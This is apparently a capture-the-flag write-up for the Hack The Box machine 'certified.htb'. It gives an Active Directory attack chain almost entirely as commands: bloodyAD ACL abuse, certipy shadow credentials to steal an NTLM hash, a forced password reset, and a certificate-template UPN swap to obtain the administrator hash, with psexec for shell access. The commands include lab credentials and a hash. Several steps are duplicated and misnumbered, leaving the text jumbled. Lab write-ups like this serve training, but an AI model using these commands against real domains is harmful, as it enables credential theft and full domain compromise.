Foothold
1. Remote Bloodhound to see that judith can modify management group, and management group has GenericWrite on mangement_svc
Grant genericAll to Management group for judith.mader
python3 ~/tools/windows/bloodyAD/bloodyAD.py --host certified.htb -d certified.htb -u judith.mader -p judith09 add genericAll Management judith.mader
Once judith.mader has write access to Management, add the account to the group
net rpc group addmem Management judith.mader -U judith.mader -S certified.htb
Exploiting GenericWrite, we use certipy to get the NTLM hash of management_svc
certipy shadow auto -u judith.mader@certified.htb -p judith09 -account management_svc
2. using the hash, we use psexec to get foothold
Grant genericAll to Management group for judith.mader
python3 ~/tools/windows/bloodyAD/bloodyAD.py --host certified.htb -d certified.htb -u judith.mader -p judith09 add genericAll Management judith.mader
Once judith.mader has write access to Management, add the account to the group
net rpc group addmem Management judith.mader -U judith.mader -S certified.htb
Exploiting GenericWrite, we use certipy to get the NTLM hash of management_svc
certipy shadow auto -u judith.mader@certified.htb -p judith09 -account management_svc
2. using the hash, we use psexec to get foothold
PrivEsc
1. mangement_svc has GenericAll over ca_operator
2. Change the password of ca_operator
3. use certipy to find vulnerable template in the context of ca_operator
certipy find -u 'ca_operator@certified.htb' -p password123\! -dc-ip 10.129.244.229 -vulnerable
2. certipy shenanigans with the vulnerable template
2. Change the password of ca_operator
3. use certipy to find vulnerable template in the context of ca_operator
certipy find -u 'ca_operator@certified.htb' -p password123\! -dc-ip 10.129.244.229 -vulnerable
2. certipy shenanigans with the vulnerable template
certipy account update -username management_svc@certified.htb -hashes 00000000000000000000000000000000:a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn administrator
certipy req -ca certified-DC01-CA -u 'ca_operator@certified.htb' -p password123\! -dc-ip 10.129.244
.229 -template CertifiedAuthentication
certipy account update -username management_svc@certified.htb -hashes 00000000000000000000000000000
000:a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator
certipy auth -pfx administrator.pfx -dc-ip 10.129.244.229
to get administrator hash
3. psexec and get root
certipy req -ca certified-DC01-CA -u 'ca_operator@certified.htb' -p password123\! -dc-ip 10.129.244
.229 -template CertifiedAuthentication
certipy account update -username management_svc@certified.htb -hashes 00000000000000000000000000000
000:a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator
certipy auth -pfx administrator.pfx -dc-ip 10.129.244.229
to get administrator hash
3. psexec and get root